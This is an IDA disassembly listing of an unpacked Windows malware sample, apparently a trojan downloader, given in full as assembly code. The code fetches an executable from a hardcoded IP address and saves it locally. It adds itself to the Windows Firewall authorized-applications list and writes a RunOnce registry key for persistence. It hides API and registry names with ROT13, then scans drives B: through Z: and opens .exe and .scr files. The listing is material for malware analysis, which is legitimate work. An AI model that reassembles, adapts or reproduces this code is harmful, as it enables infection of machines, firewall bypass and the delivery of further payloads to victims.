;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 17BF52E10375B062DC004F5205BC14EE
; File Name : u:\work\17bf52e10375b062dc004f5205bc14ee_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0000055A ( 1370.)
; Section size in file : 0000055A ( 1370.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: start+5B�p start+65�p
push offset dword_403190
push offset aHttp85_114_140 ; "http://85.114.140.107/~grander/RBvBm106"...
push offset a8 ; "8"
push offset aDummy ; "Dummy"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push ebx
call sub_401548
test eax, eax
jz loc_4014C2
retn
sub_401000 endp
; ---------------------------------------------------------------------------
byte_401028 db 31h, 0 ; DATA XREF: sub_40102A+2�o
; =============== S U B R O U T I N E =======================================
sub_40102A proc near ; CODE XREF: start+18C�p start+196�p
push 2
push offset byte_401028
push 1
push offset aDummy ; "Dummy"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push ebx
call sub_40154E
retn
sub_40102A endp
; =============== S U B R O U T I N E =======================================
sub_401044 proc near ; CODE XREF: sub_401079+106�p
; sub_401079+112�p
push edi
call sub_40153C ; lstrlen
lea edx, [ebx+5]
inc eax
push eax
push edi
push 1
push edx
push offset aHttp85_114_140 ; "http://85.114.140.107/~grander/RBvBm106"...
push ebp
call sub_40154E
test eax, eax
retn
sub_401044 endp
; ---------------------------------------------------------------------------
dword_401061 dd 6B8C7255h ; DATA XREF: sub_401079+5�r
aSSGranderS db '%s://%s/~grander/%s',0 ; DATA XREF: sub_401079+1A�o
; =============== S U B R O U T I N E =======================================
sub_401079 proc near ; CODE XREF: start+136�p
mov edi, offset aHttp85_114_140 ; "http://85.114.140.107/~grander/RBvBm106"...
push ds:dword_401061
call sub_401554 ; inet_ntoa
add ebx, 5
push ebx
push eax
push offset aHttp ; "http"
push offset aSSGranderS ; "%s://%s/~grander/%s"
push edi
call sub_401542 ; wsprintfA
add esp, 14h
sub ebx, 5
xor ecx, ecx
push ecx
push 84000300h
push ecx
push ecx
push edi
push dword_4052CE
call dword_4052D2 ; InternetOpenUrlA
test eax, eax
jz locret_40119F
xchg eax, esi
push 0
push 0
push 2
push 0
push 1
push 40000000h
push ebx
call sub_4014D0 ; CreateFileA
cmp eax, 0FFFFFFFFh
jz loc_401198
xchg eax, edi
mov byte_4052DE, 0
loc_4010EA: ; CODE XREF: sub_401079+A5�j
push eax
push esp
push 2000h
push offset aHttp85_114_140 ; "http://85.114.140.107/~grander/RBvBm106"...
push esi
call dword_4052D6 ; InternetReadFile
test eax, eax
pop ecx
jz short loc_401120
jecxz short loc_401120
mov byte_4052DE, 1
push 0
push offset dword_403190
push ecx
push offset aHttp85_114_140 ; "http://85.114.140.107/~grander/RBvBm106"...
push edi
call sub_40152A ; WriteFile
jmp short loc_4010EA
; ---------------------------------------------------------------------------
loc_401120: ; CODE XREF: sub_401079+87�j
; sub_401079+89�j
push edi
call sub_4014CA ; CloseHandle
cmp byte_4052DE, 0
jnz short loc_401137
push ebx
call sub_4014D6 ; DeleteFileA
jmp short loc_401198
; ---------------------------------------------------------------------------
loc_401137: ; CODE XREF: sub_401079+B4�j
mov edi, offset aSystemCurren_0 ; "SYSTEM\\CurrentControlSet\\Services\\Share"...
push edi
push 104h
call sub_4014F4 ; GetCurrentDirectoryA
push offset asc_40307E ; "\\"
push edi
call sub_401530 ; lstrcat
push ebx
push edi
call sub_401530 ; lstrcat
call sub_401512 ; GetVersion
js short loc_40116C
push esi
mov esi, offset aHttp85_114_140 ; "http://85.114.140.107/~grander/RBvBm106"...
call sub_4012FA
pop esi
loc_40116C: ; CODE XREF: sub_401079+E5�j
push esi
push edi
mov esi, offset aFbsgjnerZvpebf ; "Fbsgjner\\Zvpebfbsg\\Jvaqbjf\\PheeragIrefv"...
call sub_4012C8
pop edi
pop esi
mov ebp, 80000002h
call sub_401044
jz short loc_401192
mov ebp, 80000001h
call sub_401044
jnz short loc_401198
loc_401192: ; CODE XREF: sub_401079+10B�j
inc byte_4052DF
loc_401198: ; CODE XREF: sub_401079+63�j
; sub_401079+BC�j ...
push esi
call dword_4052DA ; InternetCloseHandle
locret_40119F: ; CODE XREF: sub_401079+44�j
retn
sub_401079 endp
; ---------------------------------------------------------------------------
sub ch, [esi]
sub al, [eax]
; =============== S U B R O U T I N E =======================================
sub_4011A4 proc near ; CODE XREF: sub_4011A4+85�p
; start:loc_4014A0�p
push ebx
push esi
push 32h
call sub_401524 ; Sleep
push offset aHttp85_114_140 ; "http://85.114.140.107/~grander/RBvBm106"...
call sub_40153C ; lstrlen
lea esi, aHttp85_114_140[eax] ; "http://85.114.140.107/~grander/RBvBm106"...
mov word ptr [esi], 2Ah
push offset dword_403190
push offset aHttp85_114_140 ; "http://85.114.140.107/~grander/RBvBm106"...
call sub_4014E8 ; FindFirstFileA
cmp eax, 0FFFFFFFFh
xchg eax, ebx
jz loc_4012BA
loc_4011DB: ; CODE XREF: sub_4011A4+10A�j
test dword_403190, 10h
jz short loc_401230
cmp byte_4031BC, 2Eh
jnz short loc_401213
cmp byte_4031BD, 0
jz loc_4012A1
cmp byte_4031BD, 2Eh
jnz short loc_401213
cmp byte_4031BE, 0
jz loc_4012A1
loc_401213: ; CODE XREF: sub_4011A4+4A�j
; sub_4011A4+60�j
push offset byte_4031BC
push esi
call sub_401536 ; lstrcpy
push offset asc_40307E ; "\\"
push esi
call sub_401530 ; lstrcat
call sub_4011A4
jmp short loc_4012A1
; ---------------------------------------------------------------------------
loc_401230: ; CODE XREF: sub_4011A4+41�j
xor eax, eax
xor edx, edx
loc_401234: ; CODE XREF: sub_4011A4+A5�j
cmp byte_4031BC[eax], 0
jz short loc_40124B
cmp byte_4031BC[eax], 2Eh
jnz short loc_401248
mov edx, eax
loc_401248: ; CODE XREF: sub_4011A4+A0�j
inc eax
jmp short loc_401234
; ---------------------------------------------------------------------------
loc_40124B: ; CODE XREF: sub_4011A4+97�j
sub eax, edx
cmp eax, 4
jnz short loc_4012A1
mov eax, dword ptr byte_4031BC[edx]
or eax, 20202020h
cmp eax, 6578652Eh
jz short loc_40126B
cmp eax, 7263732Eh
jnz short loc_4012A1
loc_40126B: ; CODE XREF: sub_4011A4+BE�j
push 32h
call sub_401524 ; Sleep
push offset byte_4031BC
push esi
call sub_401536 ; lstrcpy
push 0
push 0
push 3
push 0
push 3
push 80000000h
push offset aHttp85_114_140 ; "http://85.114.140.107/~grander/RBvBm106"...
call sub_4014D0 ; CreateFileA
cmp eax, 0FFFFFFFFh
jz short loc_4012A1
push eax
call sub_4014CA ; CloseHandle
loc_4012A1: ; CODE XREF: sub_4011A4+53�j
; sub_4011A4+69�j ...
push offset dword_403190
push ebx
call sub_4014EE ; FindNextFileA
test eax, eax
jnz loc_4011DB
push ebx
call sub_4014E2 ; FindClose
loc_4012BA: ; CODE XREF: sub_4011A4+31�j
pop esi
pop ebx
retn
sub_4011A4 endp
; =============== S U B R O U T I N E =======================================
sub_4012BD proc near ; CODE XREF: sub_4012C8+11�p
; sub_4012C8+24�p
cmp al, 0Dh
jb short loc_4012C5
sub al, 0Dh
jmp short locret_4012C7
; ---------------------------------------------------------------------------
loc_4012C5: ; CODE XREF: sub_4012BD+2�j
add al, 0Dh
locret_4012C7: ; CODE XREF: sub_4012BD+6�j
retn
sub_4012BD endp
; =============== S U B R O U T I N E =======================================
sub_4012C8 proc near ; CODE XREF: sub_401079+FA�p start+7D�p ...
mov edi, offset aHttp85_114_140 ; "http://85.114.140.107/~grander/RBvBm106"...
push edi
loc_4012CE: ; CODE XREF: sub_4012C8+2E�j
lodsb
cmp al, 41h
jb short loc_4012E2
cmp al, 5Ah
ja short loc_4012E2
sub al, 41h
call sub_4012BD
add al, 41h
jmp short loc_4012F3
; ---------------------------------------------------------------------------
loc_4012E2: ; CODE XREF: sub_4012C8+9�j
; sub_4012C8+D�j
cmp al, 61h
jb short loc_4012F3
cmp al, 7Ah
ja short loc_4012F3
sub al, 61h
call sub_4012BD
add al, 61h
loc_4012F3: ; CODE XREF: sub_4012C8+18�j
; sub_4012C8+1C�j ...
stosb
test al, al
jnz short loc_4012CE
pop eax
retn
sub_4012C8 endp
; =============== S U B R O U T I N E =======================================
sub_4012FA proc near ; CODE XREF: sub_401079+ED�p start+A5�p
push edi
push offset aSEnabled@shell ; "%s:*:enabled:@shell32.dll,-1"
push esi
call sub_401542 ; wsprintfA
add esp, 0Ch
inc eax
push eax
push esi
push 1
push edi
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Services\\Share"...
push 80000002h
call sub_40154E
retn
sub_4012FA endp
; ---------------------------------------------------------------------------
byte_40131F db 56h ; DATA XREF: start+1B�o
dd 542E2A52h
db 4Dh, 50h, 0
; =============== S U B R O U T I N E =======================================
public start
start proc near
mov esi, offset aHttp85_114_140 ; "http://85.114.140.107/~grander/RBvBm106"...
push esi
push 104h
call sub_40150C ; GetTempPathA
push esi
call sub_40151E ; SetCurrentDirectoryA
loc_40133D: ; CODE XREF: start+54�j
push offset dword_403190
push offset byte_40131F
call sub_4014E8 ; FindFirstFileA
cmp eax, 0FFFFFFFFh
jz short loc_40137D
xchg eax, ebx
loc_401352: ; CODE XREF: start+46�j
push offset byte_4031BC
call sub_4014D6 ; DeleteFileA
test eax, eax
jnz short loc_401371
push offset dword_403190
push ebx
call sub_4014EE ; FindNextFileA
test eax, eax
jnz short loc_401352
jmp short loc_40137D
; ---------------------------------------------------------------------------
loc_401371: ; CODE XREF: start+37�j
push offset dword_403190
call sub_4014E2 ; FindClose
jmp short loc_40133D
; ---------------------------------------------------------------------------
loc_40137D: ; CODE XREF: start+28�j start+48�j
mov ebx, 80000002h
call sub_401000
mov ebx, 80000001h
call sub_401000
call sub_401512 ; GetVersion
test eax, eax
js short loc_4013D1
or eax, 0FFFFFFFFh
int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
; DS:SI -> counted CR-terminated command string
mov esi, offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Services\\Share"...
call sub_4012C8
push eax
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Services\\Share"...
call sub_401536 ; lstrcpy
mov edi, offset aHttp85_114_140 ; "http://85.114.140.107/~grander/RBvBm106"...
lea esi, [edi+1000h]
push 104h
push esi
push 0
call sub_401500 ; GetModuleFileNameA
call sub_4012FA
loc_4013D1: ; CODE XREF: start+71�j
mov esi, offset aJvavarg_qyy ; "JVAVARG.QYY"
call sub_4012C8
push eax
call sub_401518 ; LoadLibraryA
xchg eax, ebx
mov esi, offset aVagreargbcrahe ; "VagreargBcraHeyN"
call sub_4012C8
mov word ptr [eax+0Ch], 41h
push eax
push ebx
call sub_401506 ; GetProcAddress
xor ecx, ecx
lea edx, dword_4030C2[ebp]
push ecx
push ecx
push ecx
push ecx
push edx
call eax
test eax, eax
jz loc_4014C2
mov dword_4052CE, eax
mov eax, offset aHttp85_114_140 ; "http://85.114.140.107/~grander/RBvBm106"...
mov word ptr [eax+0Ch], 7255h
push eax
push ebx
call sub_401506 ; GetProcAddress
mov dword_4052D2, eax
mov esi, offset aVagreargernqsv ; "VagreargErnqSvyr"
call sub_4012C8
push eax
push ebx
call sub_401506 ; GetProcAddress
mov dword_4052D6, eax
mov esi, offset aVagreargpybfru ; "VagreargPybfrUnaqyr"
call sub_4012C8
push eax
push ebx
call sub_401506 ; GetProcAddress
mov dword_4052DA, eax
mov ebx, offset aPsto_rbvbm1066 ; "PSTO_RBvBm1066.exe"
call sub_401079
cmp byte_4052DF, 1
jnz short loc_4014C2
push offset aB ; "B:\\"
push offset aHttp85_114_140 ; "http://85.114.140.107/~grander/RBvBm106"...
call sub_401536 ; lstrcpy
loc_40147A: ; CODE XREF: start+185�j
inc byte ptr aHttp85_114_140 ; "http://85.114.140.107/~grander/RBvBm106"...
mov byte ptr aHttp85_114_140+3, 0
push offset aHttp85_114_140 ; "http://85.114.140.107/~grander/RBvBm106"...
call sub_4014FA ; GetDriveTypeA
cmp eax, 2
jz short loc_4014A0
cmp eax, 3
jz short loc_4014A0
cmp eax, 4
jnz short loc_4014A5
loc_4014A0: ; CODE XREF: start+16D�j start+172�j
call sub_4011A4
loc_4014A5: ; CODE XREF: start+177�j
cmp byte ptr aHttp85_114_140, 5Ah ; "http://85.114.140.107/~grander/RBvBm106"...
jb short loc_40147A
mov ebx, 80000002h
call sub_40102A
mov ebx, 80000001h
call sub_40102A
loc_4014C2: ; CODE XREF: sub_401000+21�j start+E3�j ...
push 0
call sub_4014DC ; ExitProcess
int 3 ; Trap to Debugger
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4014CA proc near ; CODE XREF: sub_401079+A8�p
; sub_4011A4+F8�p
jmp ds:dword_402000
sub_4014CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4014D0 proc near ; CODE XREF: sub_401079+5B�p
; sub_4011A4+ED�p
jmp ds:dword_402004
sub_4014D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4014D6 proc near ; CODE XREF: sub_401079+B7�p start+30�p
jmp ds:dword_402008
sub_4014D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4014DC proc near ; CODE XREF: start+19D�p
jmp ds:dword_40200C
sub_4014DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4014E2 proc near ; CODE XREF: sub_4011A4+111�p start+4F�p
jmp ds:dword_402010
sub_4014E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4014E8 proc near ; CODE XREF: sub_4011A4+28�p start+20�p
jmp ds:dword_402014
sub_4014E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4014EE proc near ; CODE XREF: sub_4011A4+103�p start+3F�p
jmp ds:dword_402018
sub_4014EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4014F4 proc near ; CODE XREF: sub_401079+C9�p
jmp ds:dword_40201C
sub_4014F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4014FA proc near ; CODE XREF: start+165�p
jmp ds:dword_402020
sub_4014FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401500 proc near ; CODE XREF: start+A0�p
jmp ds:dword_402024
sub_401500 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401506 proc near ; CODE XREF: start+CD�p start+FB�p ...
jmp ds:dword_402028
sub_401506 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40150C proc near ; CODE XREF: start+B�p
jmp ds:dword_40202C
sub_40150C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401512 proc near ; CODE XREF: sub_401079+E0�p start+6A�p
jmp ds:dword_402030
sub_401512 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401518 proc near ; CODE XREF: start+B5�p
jmp ds:dword_402034
sub_401518 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40151E proc near ; CODE XREF: start+11�p
jmp ds:dword_402038
sub_40151E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401524 proc near ; CODE XREF: sub_4011A4+4�p
; sub_4011A4+C9�p
jmp ds:dword_40203C
sub_401524 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40152A proc near ; CODE XREF: sub_401079+A0�p
jmp ds:dword_402040
sub_40152A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401530 proc near ; CODE XREF: sub_401079+D4�p
; sub_401079+DB�p ...
jmp ds:dword_402044
sub_401530 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401536 proc near ; CODE XREF: sub_4011A4+75�p
; sub_4011A4+D4�p ...
jmp ds:dword_402048
sub_401536 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40153C proc near ; CODE XREF: sub_401044+1�p
; sub_4011A4+E�p
jmp ds:dword_40204C
sub_40153C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401542 proc near ; CODE XREF: sub_401079+20�p
; sub_4012FA+7�p
jmp ds:dword_402060
sub_401542 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401548 proc near ; CODE XREF: sub_401000+1A�p
jmp ds:dword_402058
sub_401548 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40154E proc near ; CODE XREF: sub_40102A+14�p
; sub_401044+15�p ...
jmp ds:dword_402054
sub_40154E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401554 proc near ; CODE XREF: sub_401079+B�p
jmp ds:dword_402068
sub_401554 endp
_text ends
; Section 2. (virtual address 00002000)
; Virtual size : 000002D2 ( 722.)
; Section size in file : 000002D2 ( 722.)
; Offset to raw data for section: 00002000
; Flags 40000040: Data Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 402000h
dword_402000 dd 77E77963h ; DATA XREF: sub_4014CA�r
dword_402004 dd 77E7A837h ; DATA XREF: sub_4014D0�r
dword_402008 dd 77E73628h ; DATA XREF: sub_4014D6�r
dword_40200C dd 77E75CB5h ; DATA XREF: sub_4014DC�r
dword_402010 dd 77E78EAAh ; DATA XREF: sub_4014E2�r
dword_402014 dd 77E75D9Eh ; DATA XREF: sub_4014E8�r
dword_402018 dd 77E75E67h ; DATA XREF: sub_4014EE�r
dword_40201C dd 77E705FCh ; DATA XREF: sub_4014F4�r
dword_402020 dd 77E6C0E3h ; DATA XREF: sub_4014FA�r
dword_402024 dd 77E7A099h ; DATA XREF: sub_401500�r
dword_402028 dd 77E7A5FDh ; DATA XREF: sub_401506�r
dword_40202C dd 77E6AD34h ; DATA XREF: sub_40150C�r
dword_402030 dd 77E7C486h ; DATA XREF: sub_401512�r
dword_402034 dd 77E805D8h ; DATA XREF: sub_401518�r
dword_402038 dd 77E705C5h ; DATA XREF: sub_40151E�r
dword_40203C dd 77E61BE6h ; DATA XREF: sub_401524�r
dword_402040 dd 77E79D8Ch ; DATA XREF: sub_40152A�r
dword_402044 dd 77E74155h ; DATA XREF: sub_401530�r
dword_402048 dd 77E73167h ; DATA XREF: sub_401536�r
dword_40204C dd 77E74672h ; DATA XREF: sub_40153C�r
dd 0
dword_402054 dd 772DA913h ; DATA XREF: sub_40154E�r
dword_402058 dd 772D7750h ; DATA XREF: sub_401548�r
align 10h
dword_402060 dd 77D4C96Ah ; DATA XREF: sub_401542�r
align 8
dword_402068 dd 71AB401Ch ; DATA XREF: sub_401554�r
align 10h
dd 20D4h, 2 dup(0)
dd 2278h, 2000h, 2134h, 2 dup(0)
dd 2292h, 2060h, 2128h, 2 dup(0)
dd 22BAh, 2054h, 213Ch, 2 dup(0)
dd 22C6h, 2068h, 5 dup(0)
dd 2144h, 2152h, 2160h, 216Eh, 217Ch, 2188h, 219Ah, 21AAh
dd 21C2h, 21D2h, 21E8h, 21FAh, 220Ah, 2218h, 2228h, 2240h
dd 2248h, 2254h, 2260h, 226Ch, 0
dd 22ACh, 229Eh, 0
dd 2286h, 0
dd 8000000Bh, 0
dd 6C430019h, 4865736Fh, 6C646E61h, 320065h, 61657243h
dd 69466574h, 41656Ch, 65440054h, 6574656Ch, 656C6946h
dd 750041h, 74697845h, 636F7250h, 737365h, 69460088h, 6C43646Eh
dd 65736Fh, 6946008Ch, 6946646Eh, 46747372h, 41656C69h
dd 910000h, 646E6946h, 7478654Eh, 656C6946h, 0E10041h
aGetcurrentdire db 'GetCurrentDirectoryA',0
align 2
dw 0F0h
aGetdrivetypea db 'GetDriveTypeA',0
dw 10Fh
aGetmodulefilen db 'GetModuleFileNameA',0
align 4
db 29h ; )
db 1, 47h, 65h
aTprocaddress db 'tProcAddress',0
align 2
dw 150h
aGettemppatha db 'GetTempPathA',0
align 2
dw 15Fh
aGetversion db 'GetVersion',0
align 4
db 0A9h ; ©
db 1, 4Ch, 6Fh
aAdlibrarya db 'adLibraryA',0
align 4
db 3Eh ; >
db 2, 53h, 65h
aTcurrentdirect db 'tCurrentDirectoryA',0
align 10h
dd 6C530273h, 706565h, 725702B9h, 46657469h, 656C69h, 736C02D3h
dd 61637274h, 4174h, 736C02DCh, 70637274h, 4179h, 736C02E2h
dd 656C7274h, 416Eh, 4E52454Bh, 32334C45h, 6C6C642Eh, 2A50000h
dd 72707377h, 66746E69h, 53550041h, 32335245h, 6C6C642Eh
dd 770000h, 65474853h, 6C615674h, 416575h, 48530099h, 56746553h
dd 65756C61h, 48530041h, 5041574Ch, 6C642E49h, 5357006Ch
dd 334B434Fh, 6C642E32h
db 6Ch, 0
_rdata ends
; Section 3. (virtual address 00003000)
; Virtual size : 000022E0 ( 8928.)
; Section size in file : 000022E0 ( 8928.)
; Offset to raw data for section: 00003000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 403000h
aSoftwareMicros db 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0
; DATA XREF: sub_401000+14�o
; sub_40102A+E�o
aDummy db 'Dummy',0 ; DATA XREF: sub_401000+F�o
; sub_40102A+9�o
aFbsgjnerZvpebf db 'Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\EhaBapr',0
; DATA XREF: sub_401079+F5�o
aHttp db 'http',0 ; DATA XREF: sub_401079+15�o
asc_40307E db '\',0 ; DATA XREF: sub_401079+CE�o
; sub_4011A4+7A�o
aJvavarg_qyy db 'JVAVARG.QYY',0 ; DATA XREF: start:loc_4013D1�o
aVagreargbcrahe db 'VagreargBcraHeyN',0 ; DATA XREF: start+BB�o
aVagreargernqsv db 'VagreargErnqSvyr',0 ; DATA XREF: start+105�o
aVagreargpybfru db 'VagreargPybfrUnaqyr',0 ; DATA XREF: start+11B�o
dword_4030C2 dd 6E776F44h ; DATA XREF: start+D4�r
aLoad db 'load',0
aPsto_wr121_exe db 'PSTO_wr-1-21.exe',0
aPsto_rbvbm1066 db 'PSTO_RBvBm1066.exe',0 ; DATA XREF: start+131�o
a8 db '8',0 ; DATA XREF: sub_401000+A�o
db 2 dup(0)
aB db 'B:\',0 ; DATA XREF: start+144�o
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\Firewal'
; DATA XREF: sub_4012FA+15�o start+78�o ...
db 'lPolicy\StandardProfile\AuthorizedApplications\List',0
aSEnabled@shell db '%s:*:enabled:@shell32.dll,-1',0 ; DATA XREF: sub_4012FA+1�o
align 10h
dword_403190 dd 0 ; DATA XREF: sub_401000�o
; sub_401079+94�o ...
dd 0Ah dup(0)
byte_4031BC db 0 ; DATA XREF: sub_4011A4+43�r
; sub_4011A4:loc_401213�o ...
byte_4031BD db 0 ; DATA XREF: sub_4011A4+4C�r
; sub_4011A4+59�r
byte_4031BE db 0 ; DATA XREF: sub_4011A4+62�r
align 10h
dd 43h dup(0)
db 2 dup(0)
aHttp85_114_140 db 'http://85.114.140.107/~grander/RBvBm1066.exe',0
; DATA XREF: sub_401000+5�o
; sub_401044+F�o ...
aSParametersFir db 's\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplication'
db 's\List',0
align 4
dd 3E2h dup(0)
db 2 dup(0)
aSystemCurren_0 db 'SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\Firewal'
; DATA XREF: sub_401079:loc_401137�o
db 'lPolicy\StandardProfile\AuthorizedApplications\List:*:enabled:@sh'
db 'ell32.dll,-1',0
align 10h
dd 3DBh dup(0)
db 2 dup(0)
dword_4052CE dd 0CC0004h ; DATA XREF: sub_401079+36�r start+E9�w
dword_4052D2 dd 76214750h ; DATA XREF: sub_401079+3C�r start+100�w
dword_4052D6 dd 7620BD61h ; DATA XREF: sub_401079+7E�r start+116�w
dword_4052DA dd 76204E4Dh ; DATA XREF: sub_401079+120�r
; start+12C�w
byte_4052DE db 0 ; DATA XREF: sub_401079+6A�w
; sub_401079+8B�w ...
byte_4052DF db 0 ; DATA XREF: sub_401079:loc_401192�w
; start+13B�r
_data ends
; Section 4. (virtual address 00006000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00005400
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 406000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start